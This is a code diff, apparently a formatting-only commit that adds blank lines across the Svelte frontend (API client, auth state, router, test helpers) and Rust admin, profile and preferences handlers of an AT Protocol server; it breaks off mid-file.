+11
frontend/src/App.svelte
+11
frontend/src/App.svelte
···
9
import Settings from './routes/Settings.svelte'
10
import Notifications from './routes/Notifications.svelte'
11
import RepoExplorer from './routes/RepoExplorer.svelte'
12
const auth = getAuthState()
13
$effect(() => {
14
initAuth()
15
})
16
function getComponent(path: string) {
17
switch (path) {
18
case '/login':
···
35
return auth.session ? Dashboard : Login
36
}
37
}
38
let currentPath = $derived(getCurrentPath())
39
let CurrentComponent = $derived(getComponent(currentPath))
40
</script>
41
<main>
42
{#if auth.loading}
43
<div class="loading">
···
47
<CurrentComponent />
48
{/if}
49
</main>
50
<style>
51
:global(:root) {
52
--bg-primary: #fafafa;
···
70
--warning-bg: #ffd;
71
--warning-text: #660;
72
}
73
@media (prefers-color-scheme: dark) {
74
:global(:root) {
75
--bg-primary: #1a1a1a;
···
94
--warning-text: #c6c67b;
95
}
96
}
97
:global(body) {
98
margin: 0;
99
font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
···
101
color: var(--text-primary);
102
background: var(--bg-primary);
103
}
104
:global(*) {
105
box-sizing: border-box;
106
}
107
main {
108
min-height: 100vh;
109
background: var(--bg-primary);
110
}
111
.loading {
112
display: flex;
113
align-items: center;
···
9
import Settings from './routes/Settings.svelte'
10
import Notifications from './routes/Notifications.svelte'
11
import RepoExplorer from './routes/RepoExplorer.svelte'
12
+
13
const auth = getAuthState()
14
+
15
$effect(() => {
16
initAuth()
17
})
18
+
19
function getComponent(path: string) {
20
switch (path) {
21
case '/login':
···
38
return auth.session ? Dashboard : Login
39
}
40
}
41
+
42
let currentPath = $derived(getCurrentPath())
43
let CurrentComponent = $derived(getComponent(currentPath))
44
</script>
45
+
46
<main>
47
{#if auth.loading}
48
<div class="loading">
···
52
<CurrentComponent />
53
{/if}
54
</main>
55
+
56
<style>
57
:global(:root) {
58
--bg-primary: #fafafa;
···
76
--warning-bg: #ffd;
77
--warning-text: #660;
78
}
79
+
80
@media (prefers-color-scheme: dark) {
81
:global(:root) {
82
--bg-primary: #1a1a1a;
···
101
--warning-text: #c6c67b;
102
}
103
}
104
+
105
:global(body) {
106
margin: 0;
107
font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
···
109
color: var(--text-primary);
110
background: var(--bg-primary);
111
}
112
+
113
:global(*) {
114
box-sizing: border-box;
115
}
116
+
117
main {
118
min-height: 100vh;
119
background: var(--bg-primary);
120
}
121
+
122
.loading {
123
display: flex;
124
align-items: center;
+37
frontend/src/lib/api.ts
+37
frontend/src/lib/api.ts
···
1
const API_BASE = '/xrpc'
2
export class ApiError extends Error {
3
public did?: string
4
constructor(public status: number, public error: string, message: string, did?: string) {
···
7
this.did = did
8
}
9
}
10
async function xrpc<T>(method: string, options?: {
11
method?: 'GET' | 'POST'
12
params?: Record<string, string>
···
37
}
38
return res.json()
39
}
40
export interface Session {
41
did: string
42
handle: string
···
47
accessJwt: string
48
refreshJwt: string
49
}
50
export interface AppPassword {
51
name: string
52
createdAt: string
53
}
54
export interface InviteCode {
55
code: string
56
available: number
···
60
createdAt: string
61
uses: { usedBy: string; usedAt: string }[]
62
}
63
export type VerificationChannel = 'email' | 'discord' | 'telegram' | 'signal'
64
export interface CreateAccountParams {
65
handle: string
66
email: string
···
71
telegramUsername?: string
72
signalNumber?: string
73
}
74
export interface CreateAccountResult {
75
handle: string
76
did: string
77
verificationRequired: boolean
78
verificationChannel: string
79
}
80
export interface ConfirmSignupResult {
81
accessJwt: string
82
refreshJwt: string
···
87
preferredChannel?: string
88
preferredChannelVerified?: boolean
89
}
90
export const api = {
91
async createAccount(params: CreateAccountParams): Promise<CreateAccountResult> {
92
return xrpc('com.atproto.server.createAccount', {
···
103
},
104
})
105
},
106
async confirmSignup(did: string, verificationCode: string): Promise<ConfirmSignupResult> {
107
return xrpc('com.atproto.server.confirmSignup', {
108
method: 'POST',
109
body: { did, verificationCode },
110
})
111
},
112
async resendVerification(did: string): Promise<{ success: boolean }> {
113
return xrpc('com.atproto.server.resendVerification', {
114
method: 'POST',
115
body: { did },
116
})
117
},
118
async createSession(identifier: string, password: string): Promise<Session> {
119
return xrpc('com.atproto.server.createSession', {
120
method: 'POST',
121
body: { identifier, password },
122
})
123
},
124
async getSession(token: string): Promise<Session> {
125
return xrpc('com.atproto.server.getSession', { token })
126
},
127
async refreshSession(refreshJwt: string): Promise<Session> {
128
return xrpc('com.atproto.server.refreshSession', {
129
method: 'POST',
130
token: refreshJwt,
131
})
132
},
133
async deleteSession(token: string): Promise<void> {
134
await xrpc('com.atproto.server.deleteSession', {
135
method: 'POST',
136
token,
137
})
138
},
139
async listAppPasswords(token: string): Promise<{ passwords: AppPassword[] }> {
140
return xrpc('com.atproto.server.listAppPasswords', { token })
141
},
142
async createAppPassword(token: string, name: string): Promise<{ name: string; password: string; createdAt: string }> {
143
return xrpc('com.atproto.server.createAppPassword', {
144
method: 'POST',
···
146
body: { name },
147
})
148
},
149
async revokeAppPassword(token: string, name: string): Promise<void> {
150
await xrpc('com.atproto.server.revokeAppPassword', {
151
method: 'POST',
···
153
body: { name },
154
})
155
},
156
async getAccountInviteCodes(token: string): Promise<{ codes: InviteCode[] }> {
157
return xrpc('com.atproto.server.getAccountInviteCodes', { token })
158
},
159
async createInviteCode(token: string, useCount: number = 1): Promise<{ code: string }> {
160
return xrpc('com.atproto.server.createInviteCode', {
161
method: 'POST',
···
163
body: { useCount },
164
})
165
},
166
async requestPasswordReset(email: string): Promise<void> {
167
await xrpc('com.atproto.server.requestPasswordReset', {
168
method: 'POST',
169
body: { email },
170
})
171
},
172
async resetPassword(token: string, password: string): Promise<void> {
173
await xrpc('com.atproto.server.resetPassword', {
174
method: 'POST',
175
body: { token, password },
176
})
177
},
178
async requestEmailUpdate(token: string): Promise<{ tokenRequired: boolean }> {
179
return xrpc('com.atproto.server.requestEmailUpdate', {
180
method: 'POST',
181
token,
182
})
183
},
184
async updateEmail(token: string, email: string, emailToken?: string): Promise<void> {
185
await xrpc('com.atproto.server.updateEmail', {
186
method: 'POST',
···
188
body: { email, token: emailToken },
189
})
190
},
191
async updateHandle(token: string, handle: string): Promise<void> {
192
await xrpc('com.atproto.identity.updateHandle', {
193
method: 'POST',
···
195
body: { handle },
196
})
197
},
198
async requestAccountDelete(token: string): Promise<void> {
199
await xrpc('com.atproto.server.requestAccountDelete', {
200
method: 'POST',
201
token,
202
})
203
},
204
async deleteAccount(did: string, password: string, deleteToken: string): Promise<void> {
205
await xrpc('com.atproto.server.deleteAccount', {
206
method: 'POST',
207
body: { did, password, token: deleteToken },
208
})
209
},
210
async describeServer(): Promise<{
211
availableUserDomains: string[]
212
inviteCodeRequired: boolean
···
214
}> {
215
return xrpc('com.atproto.server.describeServer')
216
},
217
async getNotificationPrefs(token: string): Promise<{
218
preferredChannel: string
219
email: string
···
226
}> {
227
return xrpc('com.bspds.account.getNotificationPrefs', { token })
228
},
229
async updateNotificationPrefs(token: string, prefs: {
230
preferredChannel?: string
231
discordId?: string
···
238
body: prefs,
239
})
240
},
241
async describeRepo(token: string, repo: string): Promise<{
242
handle: string
243
did: string
···
250
params: { repo },
251
})
252
},
253
async listRecords(token: string, repo: string, collection: string, options?: {
254
limit?: number
255
cursor?: string
···
264
if (options?.reverse) params.reverse = 'true'
265
return xrpc('com.atproto.repo.listRecords', { token, params })
266
},
267
async getRecord(token: string, repo: string, collection: string, rkey: string): Promise<{
268
uri: string
269
cid: string
···
274
params: { repo, collection, rkey },
275
})
276
},
277
async createRecord(token: string, repo: string, collection: string, record: unknown, rkey?: string): Promise<{
278
uri: string
279
cid: string
···
284
body: { repo, collection, record, rkey },
285
})
286
},
287
async putRecord(token: string, repo: string, collection: string, rkey: string, record: unknown): Promise<{
288
uri: string
289
cid: string
···
294
body: { repo, collection, rkey, record },
295
})
296
},
297
async deleteRecord(token: string, repo: string, collection: string, rkey: string): Promise<void> {
298
await xrpc('com.atproto.repo.deleteRecord', {
299
method: 'POST',
···
1
const API_BASE = '/xrpc'
2
+
3
export class ApiError extends Error {
4
public did?: string
5
constructor(public status: number, public error: string, message: string, did?: string) {
···
8
this.did = did
9
}
10
}
11
+
12
async function xrpc<T>(method: string, options?: {
13
method?: 'GET' | 'POST'
14
params?: Record<string, string>
···
39
}
40
return res.json()
41
}
42
+
43
export interface Session {
44
did: string
45
handle: string
···
50
accessJwt: string
51
refreshJwt: string
52
}
53
+
54
export interface AppPassword {
55
name: string
56
createdAt: string
57
}
58
+
59
export interface InviteCode {
60
code: string
61
available: number
···
65
createdAt: string
66
uses: { usedBy: string; usedAt: string }[]
67
}
68
+
69
export type VerificationChannel = 'email' | 'discord' | 'telegram' | 'signal'
70
+
71
export interface CreateAccountParams {
72
handle: string
73
email: string
···
78
telegramUsername?: string
79
signalNumber?: string
80
}
81
+
82
export interface CreateAccountResult {
83
handle: string
84
did: string
85
verificationRequired: boolean
86
verificationChannel: string
87
}
88
+
89
export interface ConfirmSignupResult {
90
accessJwt: string
91
refreshJwt: string
···
96
preferredChannel?: string
97
preferredChannelVerified?: boolean
98
}
99
+
100
export const api = {
101
async createAccount(params: CreateAccountParams): Promise<CreateAccountResult> {
102
return xrpc('com.atproto.server.createAccount', {
···
113
},
114
})
115
},
116
+
117
async confirmSignup(did: string, verificationCode: string): Promise<ConfirmSignupResult> {
118
return xrpc('com.atproto.server.confirmSignup', {
119
method: 'POST',
120
body: { did, verificationCode },
121
})
122
},
123
+
124
async resendVerification(did: string): Promise<{ success: boolean }> {
125
return xrpc('com.atproto.server.resendVerification', {
126
method: 'POST',
127
body: { did },
128
})
129
},
130
+
131
async createSession(identifier: string, password: string): Promise<Session> {
132
return xrpc('com.atproto.server.createSession', {
133
method: 'POST',
134
body: { identifier, password },
135
})
136
},
137
+
138
async getSession(token: string): Promise<Session> {
139
return xrpc('com.atproto.server.getSession', { token })
140
},
141
+
142
async refreshSession(refreshJwt: string): Promise<Session> {
143
return xrpc('com.atproto.server.refreshSession', {
144
method: 'POST',
145
token: refreshJwt,
146
})
147
},
148
+
149
async deleteSession(token: string): Promise<void> {
150
await xrpc('com.atproto.server.deleteSession', {
151
method: 'POST',
152
token,
153
})
154
},
155
+
156
async listAppPasswords(token: string): Promise<{ passwords: AppPassword[] }> {
157
return xrpc('com.atproto.server.listAppPasswords', { token })
158
},
159
+
160
async createAppPassword(token: string, name: string): Promise<{ name: string; password: string; createdAt: string }> {
161
return xrpc('com.atproto.server.createAppPassword', {
162
method: 'POST',
···
164
body: { name },
165
})
166
},
167
+
168
async revokeAppPassword(token: string, name: string): Promise<void> {
169
await xrpc('com.atproto.server.revokeAppPassword', {
170
method: 'POST',
···
172
body: { name },
173
})
174
},
175
+
176
async getAccountInviteCodes(token: string): Promise<{ codes: InviteCode[] }> {
177
return xrpc('com.atproto.server.getAccountInviteCodes', { token })
178
},
179
+
180
async createInviteCode(token: string, useCount: number = 1): Promise<{ code: string }> {
181
return xrpc('com.atproto.server.createInviteCode', {
182
method: 'POST',
···
184
body: { useCount },
185
})
186
},
187
+
188
async requestPasswordReset(email: string): Promise<void> {
189
await xrpc('com.atproto.server.requestPasswordReset', {
190
method: 'POST',
191
body: { email },
192
})
193
},
194
+
195
async resetPassword(token: string, password: string): Promise<void> {
196
await xrpc('com.atproto.server.resetPassword', {
197
method: 'POST',
198
body: { token, password },
199
})
200
},
201
+
202
async requestEmailUpdate(token: string): Promise<{ tokenRequired: boolean }> {
203
return xrpc('com.atproto.server.requestEmailUpdate', {
204
method: 'POST',
205
token,
206
})
207
},
208
+
209
async updateEmail(token: string, email: string, emailToken?: string): Promise<void> {
210
await xrpc('com.atproto.server.updateEmail', {
211
method: 'POST',
···
213
body: { email, token: emailToken },
214
})
215
},
216
+
217
async updateHandle(token: string, handle: string): Promise<void> {
218
await xrpc('com.atproto.identity.updateHandle', {
219
method: 'POST',
···
221
body: { handle },
222
})
223
},
224
+
225
async requestAccountDelete(token: string): Promise<void> {
226
await xrpc('com.atproto.server.requestAccountDelete', {
227
method: 'POST',
228
token,
229
})
230
},
231
+
232
async deleteAccount(did: string, password: string, deleteToken: string): Promise<void> {
233
await xrpc('com.atproto.server.deleteAccount', {
234
method: 'POST',
235
body: { did, password, token: deleteToken },
236
})
237
},
238
+
239
async describeServer(): Promise<{
240
availableUserDomains: string[]
241
inviteCodeRequired: boolean
···
243
}> {
244
return xrpc('com.atproto.server.describeServer')
245
},
246
+
247
async getNotificationPrefs(token: string): Promise<{
248
preferredChannel: string
249
email: string
···
256
}> {
257
return xrpc('com.bspds.account.getNotificationPrefs', { token })
258
},
259
+
260
async updateNotificationPrefs(token: string, prefs: {
261
preferredChannel?: string
262
discordId?: string
···
269
body: prefs,
270
})
271
},
272
+
273
async describeRepo(token: string, repo: string): Promise<{
274
handle: string
275
did: string
···
282
params: { repo },
283
})
284
},
285
+
286
async listRecords(token: string, repo: string, collection: string, options?: {
287
limit?: number
288
cursor?: string
···
297
if (options?.reverse) params.reverse = 'true'
298
return xrpc('com.atproto.repo.listRecords', { token, params })
299
},
300
+
301
async getRecord(token: string, repo: string, collection: string, rkey: string): Promise<{
302
uri: string
303
cid: string
···
308
params: { repo, collection, rkey },
309
})
310
},
311
+
312
async createRecord(token: string, repo: string, collection: string, record: unknown, rkey?: string): Promise<{
313
uri: string
314
cid: string
···
319
body: { repo, collection, record, rkey },
320
})
321
},
322
+
323
async putRecord(token: string, repo: string, collection: string, rkey: string, record: unknown): Promise<{
324
uri: string
325
cid: string
···
330
body: { repo, collection, rkey, record },
331
})
332
},
333
+
334
async deleteRecord(token: string, repo: string, collection: string, rkey: string): Promise<void> {
335
await xrpc('com.atproto.repo.deleteRecord', {
336
method: 'POST',
+16
frontend/src/lib/auth.svelte.ts
+16
frontend/src/lib/auth.svelte.ts
···
1
import { api, type Session, type CreateAccountParams, type CreateAccountResult, ApiError } from './api'
2
const STORAGE_KEY = 'bspds_session'
3
interface AuthState {
4
session: Session | null
5
loading: boolean
6
error: string | null
7
}
8
let state = $state<AuthState>({
9
session: null,
10
loading: true,
11
error: null,
12
})
13
function saveSession(session: Session | null) {
14
if (session) {
15
localStorage.setItem(STORAGE_KEY, JSON.stringify(session))
···
17
localStorage.removeItem(STORAGE_KEY)
18
}
19
}
20
function loadSession(): Session | null {
21
const stored = localStorage.getItem(STORAGE_KEY)
22
if (stored) {
···
28
}
29
return null
30
}
31
export async function initAuth() {
32
state.loading = true
33
state.error = null
···
54
}
55
state.loading = false
56
}
57
export async function login(identifier: string, password: string): Promise<void> {
58
state.loading = true
59
state.error = null
···
72
state.loading = false
73
}
74
}
75
export async function register(params: CreateAccountParams): Promise<CreateAccountResult> {
76
try {
77
const result = await api.createAccount(params)
···
85
throw e
86
}
87
}
88
export async function confirmSignup(did: string, verificationCode: string): Promise<void> {
89
state.loading = true
90
state.error = null
···
113
state.loading = false
114
}
115
}
116
export async function resendVerification(did: string): Promise<void> {
117
try {
118
await api.resendVerification(did)
···
123
throw new Error('Failed to resend verification code')
124
}
125
}
126
export async function logout(): Promise<void> {
127
if (state.session) {
128
try {
···
134
state.session = null
135
saveSession(null)
136
}
137
export function getAuthState() {
138
return state
139
}
140
export function getToken(): string | null {
141
return state.session?.accessJwt ?? null
142
}
143
export function isAuthenticated(): boolean {
144
return state.session !== null
145
}
146
export function _testSetState(newState: { session: Session | null; loading: boolean; error: string | null }) {
147
state.session = newState.session
148
state.loading = newState.loading
149
state.error = newState.error
150
}
151
export function _testReset() {
152
state.session = null
153
state.loading = true
···
1
import { api, type Session, type CreateAccountParams, type CreateAccountResult, ApiError } from './api'
2
+
3
const STORAGE_KEY = 'bspds_session'
4
+
5
interface AuthState {
6
session: Session | null
7
loading: boolean
8
error: string | null
9
}
10
+
11
let state = $state<AuthState>({
12
session: null,
13
loading: true,
14
error: null,
15
})
16
+
17
function saveSession(session: Session | null) {
18
if (session) {
19
localStorage.setItem(STORAGE_KEY, JSON.stringify(session))
···
21
localStorage.removeItem(STORAGE_KEY)
22
}
23
}
24
+
25
function loadSession(): Session | null {
26
const stored = localStorage.getItem(STORAGE_KEY)
27
if (stored) {
···
33
}
34
return null
35
}
36
+
37
export async function initAuth() {
38
state.loading = true
39
state.error = null
···
60
}
61
state.loading = false
62
}
63
+
64
export async function login(identifier: string, password: string): Promise<void> {
65
state.loading = true
66
state.error = null
···
79
state.loading = false
80
}
81
}
82
+
83
export async function register(params: CreateAccountParams): Promise<CreateAccountResult> {
84
try {
85
const result = await api.createAccount(params)
···
93
throw e
94
}
95
}
96
+
97
export async function confirmSignup(did: string, verificationCode: string): Promise<void> {
98
state.loading = true
99
state.error = null
···
122
state.loading = false
123
}
124
}
125
+
126
export async function resendVerification(did: string): Promise<void> {
127
try {
128
await api.resendVerification(did)
···
133
throw new Error('Failed to resend verification code')
134
}
135
}
136
+
137
export async function logout(): Promise<void> {
138
if (state.session) {
139
try {
···
145
state.session = null
146
saveSession(null)
147
}
148
+
149
export function getAuthState() {
150
return state
151
}
152
+
153
export function getToken(): string | null {
154
return state.session?.accessJwt ?? null
155
}
156
+
157
export function isAuthenticated(): boolean {
158
return state.session !== null
159
}
160
+
161
export function _testSetState(newState: { session: Session | null; loading: boolean; error: string | null }) {
162
state.session = newState.session
163
state.loading = newState.loading
164
state.error = newState.error
165
}
166
+
167
export function _testReset() {
168
state.session = null
169
state.loading = true
+3
frontend/src/lib/router.svelte.ts
+3
frontend/src/lib/router.svelte.ts
···
1
let currentPath = $state(window.location.hash.slice(1) || '/')
2
window.addEventListener('hashchange', () => {
3
currentPath = window.location.hash.slice(1) || '/'
4
})
5
export function navigate(path: string) {
6
window.location.hash = path
7
}
8
export function getCurrentPath() {
9
return currentPath
10
}
···
1
let currentPath = $state(window.location.hash.slice(1) || '/')
2
+
3
window.addEventListener('hashchange', () => {
4
currentPath = window.location.hash.slice(1) || '/'
5
})
6
+
7
export function navigate(path: string) {
8
window.location.hash = path
9
}
10
+
11
export function getCurrentPath() {
12
return currentPath
13
}
+2
frontend/src/main.ts
+2
frontend/src/main.ts
+4
frontend/src/tests/setup.ts
+4
frontend/src/tests/setup.ts
···
1
import '@testing-library/jest-dom/vitest'
2
import { vi, beforeEach, afterEach } from 'vitest'
3
import { _testReset } from '../lib/auth.svelte'
4
let locationHash = ''
5
Object.defineProperty(window, 'location', {
6
value: {
7
get hash() { return locationHash },
···
19
writable: true,
20
configurable: true,
21
})
22
beforeEach(() => {
23
vi.clearAllMocks()
24
localStorage.clear()
···
26
locationHash = ''
27
_testReset()
28
})
29
afterEach(() => {
30
vi.restoreAllMocks()
31
})
···
1
import '@testing-library/jest-dom/vitest'
2
import { vi, beforeEach, afterEach } from 'vitest'
3
import { _testReset } from '../lib/auth.svelte'
4
+
5
let locationHash = ''
6
+
7
Object.defineProperty(window, 'location', {
8
value: {
9
get hash() { return locationHash },
···
21
writable: true,
22
configurable: true,
23
})
24
+
25
beforeEach(() => {
26
vi.clearAllMocks()
27
localStorage.clear()
···
29
locationHash = ''
30
_testReset()
31
})
32
+
33
afterEach(() => {
34
vi.restoreAllMocks()
35
})
+7
frontend/src/tests/utils.ts
+7
frontend/src/tests/utils.ts
···
1
import { render, type RenderResult } from '@testing-library/svelte'
2
import { tick } from 'svelte'
3
import type { ComponentType } from 'svelte'
4
export async function renderAndWait<T extends ComponentType>(
5
component: T,
6
options?: Parameters<typeof render>[1]
···
10
await new Promise(resolve => setTimeout(resolve, 0))
11
return result
12
}
13
export async function waitForElement(
14
queryFn: () => HTMLElement | null,
15
timeout = 1000
···
22
}
23
throw new Error('Element not found within timeout')
24
}
25
export async function waitForElementToDisappear(
26
queryFn: () => HTMLElement | null,
27
timeout = 1000
···
34
}
35
throw new Error('Element still present after timeout')
36
}
37
export async function waitForText(
38
container: HTMLElement,
39
text: string | RegExp,
···
49
}
50
throw new Error(`Text "${text}" not found within timeout`)
51
}
52
export function mockLocalStorage(initialData: Record<string, string> = {}): void {
53
const store: Record<string, string> = { ...initialData }
54
Object.defineProperty(window, 'localStorage', {
···
63
writable: true,
64
})
65
}
66
export function setAuthState(session: {
67
did: string
68
handle: string
···
73
}): void {
74
localStorage.setItem('session', JSON.stringify(session))
75
}
76
export function clearAuthState(): void {
77
localStorage.removeItem('session')
78
}
···
1
import { render, type RenderResult } from '@testing-library/svelte'
2
import { tick } from 'svelte'
3
import type { ComponentType } from 'svelte'
4
+
5
export async function renderAndWait<T extends ComponentType>(
6
component: T,
7
options?: Parameters<typeof render>[1]
···
11
await new Promise(resolve => setTimeout(resolve, 0))
12
return result
13
}
14
+
15
export async function waitForElement(
16
queryFn: () => HTMLElement | null,
17
timeout = 1000
···
24
}
25
throw new Error('Element not found within timeout')
26
}
27
+
28
export async function waitForElementToDisappear(
29
queryFn: () => HTMLElement | null,
30
timeout = 1000
···
37
}
38
throw new Error('Element still present after timeout')
39
}
40
+
41
export async function waitForText(
42
container: HTMLElement,
43
text: string | RegExp,
···
53
}
54
throw new Error(`Text "${text}" not found within timeout`)
55
}
56
+
57
export function mockLocalStorage(initialData: Record<string, string> = {}): void {
58
const store: Record<string, string> = { ...initialData }
59
Object.defineProperty(window, 'localStorage', {
···
68
writable: true,
69
})
70
}
71
+
72
export function setAuthState(session: {
73
did: string
74
handle: string
···
79
}): void {
80
localStorage.setItem('session', JSON.stringify(session))
81
}
82
+
83
export function clearAuthState(): void {
84
localStorage.removeItem('session')
85
}
+1
src/api/actor/mod.rs
+1
src/api/actor/mod.rs
+3
src/api/actor/preferences.rs
+3
src/api/actor/preferences.rs
···
7
};
8
use serde::{Deserialize, Serialize};
9
use serde_json::{json, Value};
10
const APP_BSKY_NAMESPACE: &str = "app.bsky";
11
const MAX_PREFERENCES_COUNT: usize = 100;
12
const MAX_PREFERENCE_SIZE: usize = 10_000;
13
#[derive(Serialize)]
14
pub struct GetPreferencesOutput {
15
pub preferences: Vec<Value>,
···
84
.collect();
85
(StatusCode::OK, Json(GetPreferencesOutput { preferences })).into_response()
86
}
87
#[derive(Deserialize)]
88
pub struct PutPreferencesInput {
89
pub preferences: Vec<Value>,
···
7
};
8
use serde::{Deserialize, Serialize};
9
use serde_json::{json, Value};
10
+
11
const APP_BSKY_NAMESPACE: &str = "app.bsky";
12
const MAX_PREFERENCES_COUNT: usize = 100;
13
const MAX_PREFERENCE_SIZE: usize = 10_000;
14
+
15
#[derive(Serialize)]
16
pub struct GetPreferencesOutput {
17
pub preferences: Vec<Value>,
···
86
.collect();
87
(StatusCode::OK, Json(GetPreferencesOutput { preferences })).into_response()
88
}
89
+
90
#[derive(Deserialize)]
91
pub struct PutPreferencesInput {
92
pub preferences: Vec<Value>,
+9
src/api/actor/profile.rs
+9
src/api/actor/profile.rs
···
11
use serde_json::{json, Value};
12
use std::collections::HashMap;
13
use tracing::{error, info};
14
#[derive(Deserialize)]
15
pub struct GetProfileParams {
16
pub actor: String,
17
}
18
#[derive(Deserialize)]
19
pub struct GetProfilesParams {
20
pub actors: String,
21
}
22
#[derive(Serialize, Deserialize, Clone)]
23
#[serde(rename_all = "camelCase")]
24
pub struct ProfileViewDetailed {
···
35
#[serde(flatten)]
36
pub extra: HashMap<String, Value>,
37
}
38
#[derive(Serialize, Deserialize)]
39
pub struct GetProfilesOutput {
40
pub profiles: Vec<ProfileViewDetailed>,
41
}
42
async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> {
43
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
44
.fetch_optional(&state.db)
···
55
let block_bytes = state.block_store.get(&cid).await.ok()??;
56
serde_ipld_dagcbor::from_slice(&block_bytes).ok()
57
}
58
fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) {
59
if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) {
60
profile.display_name = Some(display_name.to_string());
···
63
profile.description = Some(description.to_string());
64
}
65
}
66
async fn proxy_to_appview(
67
method: &str,
68
params: &HashMap<String, String>,
···
104
}
105
}
106
}
107
pub async fn get_profile(
108
State(state): State<AppState>,
109
headers: axum::http::HeaderMap,
···
146
}
147
(StatusCode::OK, Json(profile)).into_response()
148
}
149
pub async fn get_profiles(
150
State(state): State<AppState>,
151
headers: axum::http::HeaderMap,
···
11
use serde_json::{json, Value};
12
use std::collections::HashMap;
13
use tracing::{error, info};
14
+
15
#[derive(Deserialize)]
16
pub struct GetProfileParams {
17
pub actor: String,
18
}
19
+
20
#[derive(Deserialize)]
21
pub struct GetProfilesParams {
22
pub actors: String,
23
}
24
+
25
#[derive(Serialize, Deserialize, Clone)]
26
#[serde(rename_all = "camelCase")]
27
pub struct ProfileViewDetailed {
···
38
#[serde(flatten)]
39
pub extra: HashMap<String, Value>,
40
}
41
+
42
#[derive(Serialize, Deserialize)]
43
pub struct GetProfilesOutput {
44
pub profiles: Vec<ProfileViewDetailed>,
45
}
46
+
47
async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> {
48
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
49
.fetch_optional(&state.db)
···
60
let block_bytes = state.block_store.get(&cid).await.ok()??;
61
serde_ipld_dagcbor::from_slice(&block_bytes).ok()
62
}
63
+
64
fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) {
65
if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) {
66
profile.display_name = Some(display_name.to_string());
···
69
profile.description = Some(description.to_string());
70
}
71
}
72
+
73
async fn proxy_to_appview(
74
method: &str,
75
params: &HashMap<String, String>,
···
111
}
112
}
113
}
114
+
115
pub async fn get_profile(
116
State(state): State<AppState>,
117
headers: axum::http::HeaderMap,
···
154
}
155
(StatusCode::OK, Json(profile)).into_response()
156
}
157
+
158
pub async fn get_profiles(
159
State(state): State<AppState>,
160
headers: axum::http::HeaderMap,
+2
src/api/admin/account/delete.rs
+2
src/api/admin/account/delete.rs
+3
src/api/admin/account/email.rs
+3
src/api/admin/account/email.rs
···
8
use serde::{Deserialize, Serialize};
9
use serde_json::json;
10
use tracing::{error, warn};
11
#[derive(Deserialize)]
12
#[serde(rename_all = "camelCase")]
13
pub struct SendEmailInput {
···
17
pub subject: Option<String>,
18
pub comment: Option<String>,
19
}
20
#[derive(Serialize)]
21
pub struct SendEmailOutput {
22
pub sent: bool,
23
}
24
pub async fn send_email(
25
State(state): State<AppState>,
26
headers: axum::http::HeaderMap,
···
8
use serde::{Deserialize, Serialize};
9
use serde_json::json;
10
use tracing::{error, warn};
11
+
12
#[derive(Deserialize)]
13
#[serde(rename_all = "camelCase")]
14
pub struct SendEmailInput {
···
18
pub subject: Option<String>,
19
pub comment: Option<String>,
20
}
21
+
22
#[derive(Serialize)]
23
pub struct SendEmailOutput {
24
pub sent: bool,
25
}
26
+
27
pub async fn send_email(
28
State(state): State<AppState>,
29
headers: axum::http::HeaderMap,
+6
src/api/admin/account/info.rs
+6
src/api/admin/account/info.rs
···
8
use serde::{Deserialize, Serialize};
9
use serde_json::json;
10
use tracing::error;
11
#[derive(Deserialize)]
12
pub struct GetAccountInfoParams {
13
pub did: String,
14
}
15
#[derive(Serialize)]
16
#[serde(rename_all = "camelCase")]
17
pub struct AccountInfo {
···
24
pub email_confirmed_at: Option<String>,
25
pub deactivated_at: Option<String>,
26
}
27
#[derive(Serialize)]
28
#[serde(rename_all = "camelCase")]
29
pub struct GetAccountInfosOutput {
30
pub infos: Vec<AccountInfo>,
31
}
32
pub async fn get_account_info(
33
State(state): State<AppState>,
34
headers: axum::http::HeaderMap,
···
92
}
93
}
94
}
95
#[derive(Deserialize)]
96
pub struct GetAccountInfosParams {
97
pub dids: String,
98
}
99
pub async fn get_account_infos(
100
State(state): State<AppState>,
101
headers: axum::http::HeaderMap,
···
8
use serde::{Deserialize, Serialize};
9
use serde_json::json;
10
use tracing::error;
11
+
12
#[derive(Deserialize)]
13
pub struct GetAccountInfoParams {
14
pub did: String,
15
}
16
+
17
#[derive(Serialize)]
18
#[serde(rename_all = "camelCase")]
19
pub struct AccountInfo {
···
26
pub email_confirmed_at: Option<String>,
27
pub deactivated_at: Option<String>,
28
}
29
+
30
#[derive(Serialize)]
31
#[serde(rename_all = "camelCase")]
32
pub struct GetAccountInfosOutput {
33
pub infos: Vec<AccountInfo>,
34
}
35
+
36
pub async fn get_account_info(
37
State(state): State<AppState>,
38
headers: axum::http::HeaderMap,
···
96
}
97
}
98
}
99
+
100
#[derive(Deserialize)]
101
pub struct GetAccountInfosParams {
102
pub dids: String,
103
}
104
+
105
pub async fn get_account_infos(
106
State(state): State<AppState>,
107
headers: axum::http::HeaderMap,
+1
src/api/admin/account/mod.rs
+1
src/api/admin/account/mod.rs
+6
src/api/admin/account/update.rs
+6
src/api/admin/account/update.rs
···
8
use serde::Deserialize;
9
use serde_json::json;
10
use tracing::error;
11
#[derive(Deserialize)]
12
pub struct UpdateAccountEmailInput {
13
pub account: String,
14
pub email: String,
15
}
16
pub async fn update_account_email(
17
State(state): State<AppState>,
18
headers: axum::http::HeaderMap,
···
59
}
60
}
61
}
62
#[derive(Deserialize)]
63
pub struct UpdateAccountHandleInput {
64
pub did: String,
65
pub handle: String,
66
}
67
pub async fn update_account_handle(
68
State(state): State<AppState>,
69
headers: axum::http::HeaderMap,
···
139
}
140
}
141
}
142
#[derive(Deserialize)]
143
pub struct UpdateAccountPasswordInput {
144
pub did: String,
145
pub password: String,
146
}
147
pub async fn update_account_password(
148
State(state): State<AppState>,
149
headers: axum::http::HeaderMap,
···
8
use serde::Deserialize;
9
use serde_json::json;
10
use tracing::error;
11
+
12
#[derive(Deserialize)]
13
pub struct UpdateAccountEmailInput {
14
pub account: String,
15
pub email: String,
16
}
17
+
18
pub async fn update_account_email(
19
